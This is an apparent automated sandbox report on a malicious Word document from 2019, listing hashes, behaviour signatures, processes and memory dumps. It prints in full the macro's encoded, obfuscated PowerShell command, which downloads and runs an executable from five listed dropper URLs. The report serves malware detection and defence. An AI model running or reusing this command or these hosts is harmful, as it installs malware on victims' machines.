Analysis

  • max time kernel
    121s
  • max time network
    122s
  • platform
    windows7_x64
  • resource
    win7-20240508-en
  • resource tags

    arch:x64arch:x86image:win7-20240508-enlocale:en-usos:windows7-x64system
  • submitted
    01/06/2024, 14:57

General

  • Target

    184161159716_May_01_2019.doc

  • Size

    143KB

  • MD5

    9765b1f2671591dd540dbfdb9ff5dadb

  • SHA1

    112e46cfec2ee3eb87c870e7fc21dc03a75a1af3

  • SHA256

    46f93e1565d462f05fa4e0f7c7268c05b4b1321f9616f23236f24a4cb9e8e67b

  • SHA512

    5b013a14cc54e1b4dbbbc9cb1057f989dd609bd58e189c50972510d089596fc920758b6876e1950d8f97f6b61ea96d2a55750abd6ec311089894353ee24345bf

  • SSDEEP

    3072:k77HUUUUUUUUUUUUUUUUUUUTkOQePu5U8qDnFbHjuTsiDoA1Wxsj:k77HUUUUUUUUUUUUUUUUUUUT52VEFbHG

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

http://webaphobia.com/images/72Ca/

exe.dropper

https://montalegrense.graficosassociados.com/keywords/FOYo/

exe.dropper

http://purimaro.com/1/ww/

exe.dropper

http://jpmtech.com/css/GOOvqd/

exe.dropper

http://118.89.215.166/wp-includes/l5/

Signatures

  • Process spawned unexpected child process 1 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • Blocklisted process makes network request 2 IoCs
  • Drops file in System32 directory 1 IoCs
  • Drops file in Windows directory 1 IoCs
  • Office loads VBA resources, possible macro or embedded object present
  • Modifies Internet Explorer settings 1 TTPs 31 IoCs
  • Modifies registry class 64 IoCs
  • Suspicious behavior: AddClipboardFormatListener 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 4 IoCs

Processes

  • C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE
    "C:\Program Files (x86)\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\Admin\AppData\Local\Temp\184161159716_May_01_2019.doc"
    1⤵
    • Drops file in Windows directory
    • Modifies Internet Explorer settings
    • Modifies registry class
    • Suspicious behavior: AddClipboardFormatListener
    • Suspicious use of SetWindowsHookEx
    • Suspicious use of WriteProcessMemory
    PID:2116
    • C:\Windows\splwow64.exe
      C:\Windows\splwow64.exe 12288
      2⤵
        PID:2852
    • C:\Windows\System32\WindowsPowerShell\v1.0\powErSHell.exe
      powErSHell -e JABHAHgAUQBHAEIAQwBBAF8APQAoACgAJwBLAEMAJwArACcARAAnACkAKwAnAEQANAAnACsAJwAxACcAKQA7ACQAYwBrAEEANAAxAFEAUQBYACAAPQAgACgAJwA4ACcAKwAnADEAMwAnACkAOwAkAE8AUQBrAEEARABVAFUAWgA9ACgAKAAnAHEAJwArACcAQQB4ACcAKQArACcARAAnACsAKAAiAHsAMQB9AHsAMAB9ACIALQBmACcANABjACcALAAnAHcAQgAnACkAKQA7ACQAaABRAFEAQQBCAG8AMQBBAD0AJABlAG4AdgA6AHUAcwBlAHIAcAByAG8AZgBpAGwAZQArACcAXAAnACsAJABjAGsAQQA0ADEAUQBRAFgAKwAoACcALgAnACsAKAAnAGUAeAAnACsAJwBlACcAKQApADsAJAB1AEEAQQA0AEEAUQA0AD0AKAAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcAeAAnACwAKAAnAEEAJwArACcAeABVACcAKQApACsAJwBYACcAKwAnAEEAJwApADsAJABDAEEAYwBEAEEAQQA9AC4AKAAnAG4AZQB3ACcAKwAnAC0AJwArACcAbwBiAGoAJwArACcAZQBjAHQAJwApACAAbgBgAGUAVAAuAFcAZQBCAEMAYABsAGAASQBFAE4AdAA7ACQAWQBCAEEAQQBVAF8ARAA9ACgAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAnAGgAdAAnACsAJwB0ACcAKQAsACgAJwBwACcAKwAnADoALwAnACkAKQArACgAIgB7ADAAfQB7ADEAfQB7ADIAfQAiAC0AZgAnAC8AdwAnACwAJwBlACcALAAoACcAYgAnACsAJwBhAHAAaAAnACkAKQArACcAbwAnACsAJwBiAGkAJwArACcAYQAnACsAKAAiAHsAMgB9AHsAMQB9AHsAMAB9ACIALQBmACAAKAAnAGkAJwArACcAbQBhACcAKQAsACcAbQAvACcALAAoACcALgAnACsAJwBjAG8AJwApACkAKwAoACIAewAzAH0AewAwAH0AewAyAH0AewA0AH0AewAxAH0AIgAtAGYAJwBlAHMAJwAsACgAJwAvACcAKwAnAEAAaAB0AHQAcAAnACkALAAoACcALwA3ACcAKwAnADIAQwAnACkALAAnAGcAJwAsACcAYQAnACkAKwAnAHMAOgAnACsAJwAvAC8AJwArACgAIgB7ADEAfQB7ADIAfQB7ADAAfQAiAC0AZgAoACcAdABhACcAKwAnAGwAJwArACcAZQBnAHIAZQBuACcAKQAsACcAbQBvACcALAAnAG4AJwApACsAJwBzACcAKwAoACcAZQAuACcAKwAnAGcAJwApACsAKAAiAHsAMAB9AHsAMQB9ACIALQBmACgAJwByAGEAJwArACcAZgAnACkALAAnAGkAJwApACsAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAnAGMAbwBzACcAKwAnAGEAJwApACwAJwBzACcAKQArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACgAJwBzACcAKwAnAG8AYwAnACkALAAnAGkAJwApACsAKAAiAHsAMQB9AHsAMgB9AHsAMAB9ACIALQBmACAAJwBtAC8AJwAsACcAYQAnACwAKAAnAGQAbwBzAC4AJwArACcAYwBvACcAKQApACsAJwBrACcAKwAoACIAewAyAH0AewAwAH0AewAxAH0AIgAgAC0AZgAgACgAJwB3ACcAKwAnAG8AcgBkAHMAJwArACcALwAnACkALAAoACcARgAnACsAJwBPAFkAbwAnACkALAAnAGUAeQAnACkAKwAoACIAewAxAH0AewAwAH0AewAzAH0AewAyAH0AIgAgAC0AZgAgACcAQAAnACwAJwAvACcALAAoACcAdAB0AHAAJwArACcAOgAvAC8AcAAnACsAJwB1AHIAJwApACwAJwBoACcAKQArACcAaQAnACsAJwBtAGEAJwArACcAcgAnACsAJwBvACcAKwAoACIAewAxAH0AewAwAH0AIgAtAGYAJwBtACcALAAoACcALgBjACcAKwAnAG8AJwApACkAKwAoACIAewAwAH0AewAxAH0AIgAtAGYAKAAnAC8AMQAnACsAJwAvACcAKQAsACcAdwB3ACcAKQArACgAJwAvACcAKwAnAEAAaAAnACkAKwAoACcAdAB0ACcAKwAnAHAAJwApACsAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAKAAnADoALwAnACsAJwAvAGoAJwApACwAJwBwAG0AJwApACsAKAAnAHQAZQAnACsAJwBjACcAKQArACcAaAAnACsAKAAiAHsAMQB9AHsAMAB9AHsAMgB9ACIALQBmACgAJwAvAGMAcwAnACsAJwBzACcAKQAsACgAJwAuAGMAbwAnACsAJwBtACcAKQAsACgAJwAvACcAKwAnAEcATwBPACcAKQApACsAJwB2ACcAKwAoACcAcQBkACcAKwAnAC8AJwApACsAJwBAACcAKwAnAGgAJwArACgAIgB7ADAAfQB7ADEAfQAiACAALQBmACAAJwB0ACcALAAoACcAdABwACcAKwAnADoAJwApACkAKwAnAC8AJwArACcALwAxACcAKwAoACIAewAxAH0AewAwAH0AIgAgAC0AZgAgACcALgAnACwAKAAnADEAOAAuACcAKwAnADgAOQAnACkAKQArACgAIgB7ADIAfQB7ADAAfQB7ADEAfQAiAC0AZgAgACcANQAnACwAKAAnAC4AMQA2ACcAKwAnADYALwAnACkALAAnADIAMQAnACkAKwAoACIAewAyAH0AewAwAH0AewAxAH0AIgAtAGYAJwBwAC0AJwAsACgAJwBpAG4AJwArACcAYwAnACkALAAnAHcAJwApACsAKAAnAGwAJwArACcAdQBkACcAKQArACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAKAAnAHMAJwArACcALwBsADUALwAnACkALAAnAGUAJwApACkALgBTAHAAbABJAHQAKAAnAEAAJwApADsAJABVAEEAQQBYAF8AQQBCAEIAPQAoACcAZgAnACsAJwBvAHcAJwArACgAJwBjADEAJwArACcAVQAnACkAKQA7AGYAbwByAGUAYQBjAGgAKAAkAGkAQQB3AEQAbwB3AEEAIABpAG4AIAAkAFkAQgBBAEEAVQBfAEQAKQB7AHQAcgB5AHsAJABDAEEAYwBEAEEAQQAuAEQATwB3AE4AbABPAGEAZABGAGkAbABFACgAJABpAEEAdwBEAG8AdwBBACwAIAAkAGgAUQBRAEEAQgBvADEAQQApADsAJABhAEMAUQB4ADQAQQA9ACgAKAAiAHsAMAB9AHsAMQB9ACIAIAAtAGYAJwBxAG8AJwAsACgAJwBrACcAKwAnAEEAQgAnACkAKQArACcAQwB3ACcAKQA7AEkAZgAgACgAKAAmACgAJwBHAGUAdAAnACsAJwAtAEkAJwArACcAdABlAG0AJwApACAAJABoAFEAUQBBAEIAbwAxAEEAKQAuAGwARQBOAGcAVABoACAALQBnAGUAIAAzADcAMgAzADgAKQAgAHsALgAoACcASQBuAHYAJwArACcAbwAnACsAJwBrACcAKwAnAGUALQBJAHQAZQBtACcAKQAgACQAaABRAFEAQQBCAG8AMQBBADsAJABzAEEAQQBBAEEAQQBRADQAPQAoACgAIgB7ADEAfQB7ADAAfQAiAC0AZgAgACgAJwBBACcAKwAnAHgAQQAnACkALAAnAHUAeAAnACkAKwAnAEQAJwApADsAYgByAGUAYQBrADsAJABZAFUAUQBBAEEAQQA9ACgAKAAnAG0AJwArACcAUQBBACcAKQArACgAIgB7ADEAfQB7ADAAfQAiACAALQBmACAAKAAnAEEARAAnACsAJwBRACcAKQAsACcARwAnACkAKwAnAEEAJwApAH0AfQBjAGEAdABjAGgAewB9AH0AJABpAEQAVQBBAHcAeAA9ACgAKAAiAHsAMAB9AHsAMQB9ACIALQBmACAAKAAnAGEAUQAnACsAJwBBACcAKQAsACcAawAnACkAKwAnAFoAQQAnACkA
      1⤵
      • Process spawned unexpected child process
      • Blocklisted process makes network request
      • Drops file in System32 directory
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:2544

    Network

          MITRE ATT&CK Enterprise v15

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Roaming\Microsoft\Templates\Normal.dotm

            Filesize

            20KB

            MD5

            28f0013620a426392ff5505d0fe65f5e

            SHA1

            4574ccf6ec10ce5e4d8d278714f3735926d585a5

            SHA256

            5d6ff2c4ef7b35d9fac421f30672642becfb9dd2cceeade67af684344387633b

            SHA512

            948ffa97677c661d7849605edc9fa5133ccc95d612ab939a6edabaf7785e02330517589264e39b663c652798a902a528e7a3a1fe73acf24017c6a8efca46abbb

          • memory/2116-11-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-15-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-7-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-8-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-9-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-10-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-13-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-14-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-12-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-0-0x000000002FC11000-0x000000002FC12000-memory.dmp

            Filesize

            4KB

          • memory/2116-2-0x00000000711DD000-0x00000000711E8000-memory.dmp

            Filesize

            44KB

          • memory/2116-18-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-17-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-49-0x00000000711DD000-0x00000000711E8000-memory.dmp

            Filesize

            44KB

          • memory/2116-48-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2116-30-0x00000000711DD000-0x00000000711E8000-memory.dmp

            Filesize

            44KB

          • memory/2116-31-0x00000000006C0000-0x00000000007C0000-memory.dmp

            Filesize

            1024KB

          • memory/2116-32-0x0000000006490000-0x0000000006590000-memory.dmp

            Filesize

            1024KB

          • memory/2116-1-0x000000005FFF0000-0x0000000060000000-memory.dmp

            Filesize

            64KB

          • memory/2544-25-0x0000000002810000-0x0000000002818000-memory.dmp

            Filesize

            32KB

          • memory/2544-24-0x000000001B630000-0x000000001B912000-memory.dmp

            Filesize

            2.9MB